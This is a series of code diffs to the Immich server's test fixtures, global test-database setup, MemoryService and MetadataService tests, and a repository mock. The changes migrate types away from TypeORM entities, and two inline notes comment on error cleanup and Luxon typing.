-  adminSharedLink: Object.freeze<AuthDto>({
+  adminSharedLink: Object.freeze({
     user: authUser.admin,
     sharedLink: {
       id: '123',
       showExif: true,
       allowDownload: true,
       allowUpload: true,
-      key: Buffer.from('shared-link-key'),
-    } as SharedLinkEntity,
+      expiresAt: null,
+      password: null,
+      userId: '42',
+    },
   }),
 };
31
server/test/fixtures/shared-link.stub.ts
vendored
@@ -1,10 +1,9 @@
 import { UserAdmin } from 'src/database';
 import { AlbumResponseDto } from 'src/dtos/album.dto';
-import { AssetResponseDto } from 'src/dtos/asset-response.dto';
+import { AssetResponseDto, MapAsset } from 'src/dtos/asset-response.dto';
 import { ExifResponseDto } from 'src/dtos/exif.dto';
 import { SharedLinkResponseDto } from 'src/dtos/shared-link.dto';
 import { mapUser } from 'src/dtos/user.dto';
-import { SharedLinkEntity } from 'src/entities/shared-link.entity';
 import { AssetOrder, AssetStatus, AssetType, SharedLinkType } from 'src/enum';
 import { assetStub } from 'test/fixtures/asset.stub';
 import { authStub } from 'test/fixtures/auth.stub';
@@ -113,12 +112,12 @@ export const sharedLinkStub = {
     allowUpload: true,
     allowDownload: true,
     showExif: true,
-    album: undefined,
+    albumId: null,
+    album: null,
     description: null,
     assets: [assetStub.image],
     password: 'password',
-    albumId: null,
-  } as SharedLinkEntity),
+  }),
   valid: Object.freeze({
     id: '123',
     userId: authStub.admin.user.id,
@@ -130,12 +129,12 @@ export const sharedLinkStub = {
     allowUpload: true,
     allowDownload: true,
     showExif: true,
-    album: undefined,
     albumId: null,
     description: null,
     password: null,
-    assets: [],
-  } as SharedLinkEntity),
+    assets: [] as MapAsset[],
+    album: null,
+  }),
   expired: Object.freeze({
     id: '123',
     userId: authStub.admin.user.id,
@@ -150,9 +149,10 @@ export const sharedLinkStub = {
     description: null,
     password: null,
     albumId: null,
-    assets: [],
-  } as SharedLinkEntity),
-  readonlyNoExif: Object.freeze<SharedLinkEntity>({
+    assets: [] as MapAsset[],
+    album: null,
+  }),
+  readonlyNoExif: Object.freeze({
     id: '123',
     userId: authStub.admin.user.id,
     key: sharedLinkBytes,
@@ -168,6 +168,7 @@ export const sharedLinkStub = {
     albumId: 'album-123',
     album: {
       id: 'album-123',
+      updateId: '42',
       ownerId: authStub.admin.user.id,
       owner: userStub.admin,
       albumName: 'Test Album',
@@ -239,17 +240,22 @@ export const sharedLinkStub = {
             colorspace: 'sRGB',
             autoStackId: null,
             rating: 3,
+            updatedAt: today,
+            updateId: '42',
           },
           sharedLinks: [],
           faces: [],
           sidecarPath: null,
           deletedAt: null,
           duplicateId: null,
+          updateId: '42',
+          libraryId: null,
+          stackId: null,
         },
       ],
     },
   }),
-  passwordRequired: Object.freeze<SharedLinkEntity>({
+  passwordRequired: Object.freeze({
     id: '123',
     userId: authStub.admin.user.id,
     key: sharedLinkBytes,
@@ -263,6 +269,7 @@ export const sharedLinkStub = {
     password: 'password',
     assets: [],
     albumId: null,
+    album: null,
   }),
 };
@@ -1,10 +1,11 @@
-import { FileMigrationProvider, Kysely, Migrator } from 'kysely';
-import { mkdir, readdir } from 'node:fs/promises';
-import { join } from 'node:path';
+import { Kysely } from 'kysely';
 import { parse } from 'pg-connection-string';
+import { DB } from 'src/db';
+import { ConfigRepository } from 'src/repositories/config.repository';
+import { DatabaseRepository } from 'src/repositories/database.repository';
+import { LoggingRepository } from 'src/repositories/logging.repository';
 import { getKyselyConfig } from 'src/utils/database';
 import { GenericContainer, Wait } from 'testcontainers';
-import { DataSource } from 'typeorm';

 const globalSetup = async () => {
   const postgresContainer = await new GenericContainer('tensorchord/pgvecto-rs:pg14-v0.2.0')
@@ -36,66 +37,23 @@ const globalSetup = async () => {

   const postgresPort = postgresContainer.getMappedPort(5432);
   const postgresUrl = `postgres://postgres:postgres@localhost:${postgresPort}/immich`;
+  const parsed = parse(postgresUrl);

   process.env.IMMICH_TEST_POSTGRES_URL = postgresUrl;

-  // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-  // @ts-expect-error
-  const modules = import.meta.glob('/src/migrations/*.ts', { eager: true });
-
-  const config = {
-    type: 'postgres' as const,
-    // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-    // @ts-expect-error
-    migrations: Object.values(modules).map((module) => Object.values(module)[0]),
-    migrationsRun: false,
-    synchronize: false,
-    connectTimeoutMS: 10_000, // 10 seconds
-    parseInt8: true,
-    url: postgresUrl,
-  };
-
-  // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-  // @ts-expect-error
-  const dataSource = new DataSource(config);
-  await dataSource.initialize();
-  await dataSource.runMigrations();
-  await dataSource.destroy();
-
-  // for whatever reason, importing from test/utils causes vitest to crash
-  // eslint-disable-next-line unicorn/prefer-module
-  const migrationFolder = join(__dirname, '..', 'schema/migrations');
-  // TODO remove after we have at least one kysely migration
-  await mkdir(migrationFolder, { recursive: true });
-
-  const parsed = parse(process.env.IMMICH_TEST_POSTGRES_URL!);
-
-  const parsedOptions = {
+  const db = new Kysely<DB>(
+    getKyselyConfig({
       ...parsed,
       ssl: false,
      host: parsed.host ?? undefined,
      port: parsed.port ? Number(parsed.port) : undefined,
      database: parsed.database ?? undefined,
-  };
-
-  const db = new Kysely(getKyselyConfig(parsedOptions));
-
-  // TODO just call `databaseRepository.migrate()` (probably have to wait until TypeOrm is gone)
-  const migrator = new Migrator({
-    db,
-    migrationLockTableName: 'kysely_migrations_lock',
-    migrationTableName: 'kysely_migrations',
-    provider: new FileMigrationProvider({
-      fs: { readdir },
-      path: { join },
-      migrationFolder,
     }),
-  });
+  );

-  const { error } = await migrator.migrateToLatest();
-  if (error) {
-    console.error('Unable to run kysely migrations', error);
-    throw error;
-  }
+  const configRepository = new ConfigRepository();
+  const logger = new LoggingRepository(undefined, configRepository);
+  await new DatabaseRepository(db, logger, configRepository).runMigrations();

   await db.destroy();
 };
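Note: in the rewritten setup above, a failed migration now rejects inside `runMigrations()` instead of going through the old `console.error`/`throw` path, and the Kysely handle is only destroyed on the happy path. A slightly more defensive variant as a sketch, using the same repositories as the diff:

    try {
      await new DatabaseRepository(db, logger, configRepository).runMigrations();
    } finally {
      await db.destroy(); // tear the connection down even if migrations fail
    }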
@@ -39,9 +39,12 @@ describe(MemoryService.name, () => {
   it('should create a memory from an asset', async () => {
     const { sut, repos, getRepository } = createSut();

-    const now = DateTime.fromObject({ year: 2025, month: 2, day: 25 }, { zone: 'utc' });
+    const now = DateTime.fromObject({ year: 2025, month: 2, day: 25 }, { zone: 'utc' }) as DateTime<true>;
     const user = mediumFactory.userInsert();
-    const asset = mediumFactory.assetInsert({ ownerId: user.id, localDateTime: now.minus({ years: 1 }).toISO() });
+    const asset = mediumFactory.assetInsert({
+      ownerId: user.id,
+      localDateTime: now.minus({ years: 1 }).toISO(),
+    });
     const jobStatus = mediumFactory.assetJobStatusInsert({ assetId: asset.id });

     const userRepo = getRepository('user');
@@ -86,7 +89,7 @@ describe(MemoryService.name, () => {
   it('should not generate a memory twice for the same day', async () => {
     const { sut, repos, getRepository } = createSut();

-    const now = DateTime.fromObject({ year: 2025, month: 2, day: 20 }, { zone: 'utc' });
+    const now = DateTime.fromObject({ year: 2025, month: 2, day: 20 }, { zone: 'utc' }) as DateTime<true>;

     const assetRepo = getRepository('asset');
     const memoryRepo = getRepository('memory');
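Note: the `as DateTime<true>` casts above pin Luxon's validity type parameter. A sketch of why, assuming Luxon 3.x typings (where validity is tracked as a boolean type parameter and factory methods return the unnarrowed type, since validity is only known at runtime):

    import { DateTime } from 'luxon';

    const now = DateTime.fromObject({ year: 2025, month: 2, day: 25 }, { zone: 'utc' }) as DateTime<true>;
    // On DateTime<true>, toISO() is typed string rather than string | null, so the
    // factory's localDateTime field accepts it without a null check.
    const aYearAgo: string = now.minus({ years: 1 }).toISO();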
@@ -118,7 +118,7 @@ describe(MetadataService.name, () => {
     process.env.TZ = serverTimeZone ?? undefined;

     const { filePath } = await createTestFile(exifData);
-    mocks.assetJob.getForMetadataExtraction.mockResolvedValue({ id: 'asset-1', originalPath: filePath } as never);
+    mocks.assetJob.getForMetadataExtraction.mockResolvedValue({ id: 'asset-1', originalPath: filePath } as any);

     await sut.handleMetadataExtraction({ id: 'asset-1' });

@@ -11,7 +11,7 @@ export const newAssetRepositoryMock = (): Mocked<RepositoryInterface<AssetReposi
   upsertJobStatus: vitest.fn(),
   getByDayOfYear: vitest.fn(),
   getByIds: vitest.fn().mockResolvedValue([]),
-  getByIdsWithAllRelations: vitest.fn().mockResolvedValue([]),
+  getByIdsWithAllRelationsButStacks: vitest.fn().mockResolvedValue([]),
   getByDeviceIds: vitest.fn(),
   getByUserId: vitest.fn(),
   getById: vitest.fn(),
@@ -2,7 +2,6 @@ import { randomUUID } from 'node:crypto';
 import {
   Activity,
   ApiKey,
-  Asset,
   AuthApiKey,
   AuthSharedLink,
   AuthUser,
@@ -14,6 +13,7 @@ import {
   User,
   UserAdmin,
 } from 'src/database';
+import { MapAsset } from 'src/dtos/asset-response.dto';
 import { AuthDto } from 'src/dtos/auth.dto';
 import { AssetStatus, AssetType, MemoryType, Permission, UserStatus } from 'src/enum';
 import { OnThisDayData } from 'src/types';
@@ -184,7 +184,7 @@ const userAdminFactory = (user: Partial<UserAdmin> = {}) => {
   };
 };

-const assetFactory = (asset: Partial<Asset> = {}) => ({
+const assetFactory = (asset: Partial<MapAsset> = {}) => ({
   id: newUuid(),
   createdAt: newDate(),
   updatedAt: newDate(),